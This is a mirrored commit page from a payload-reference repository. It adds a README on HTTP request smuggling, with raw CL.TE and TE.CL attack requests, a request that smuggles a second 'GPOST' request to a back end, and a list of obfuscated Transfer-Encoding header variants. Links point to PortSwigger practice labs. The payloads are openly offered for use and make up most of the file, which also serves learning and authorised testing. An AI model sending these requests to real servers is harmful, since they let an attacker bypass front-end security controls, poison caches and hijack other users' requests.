Mirrors/PayloadsAllTheThings
6
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2024-06-27 09:28:48 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

HTTP Request Smuggling

Browse Source
This commit is contained in:
Swissky 2020-08-25 14:38:28 +02:00
parent 75a0f34bdc
commit f431ea7166
1 changed files with 103 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

103
Request Smuggling/README.md Normal file
View File

@ -0,0 +1,103 @@
# Request Smuggling
## Summary
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
* [References](#references)
## CL.TE vulnerabilities
> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
```powershell
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
```
Example:
```powershell
POST / HTTP/1.1
Host: domain.example.com
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
```
Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
## TE.CL vulnerabilities
> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
```powershell
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
```
Example:
```powershell
POST / HTTP/1.1
Host: domain.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
Content-Length: 4
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
```
:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0.
Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
## TE.TE behavior: obfuscating the TE header
> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
```powershell
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```
Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
## References
* [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)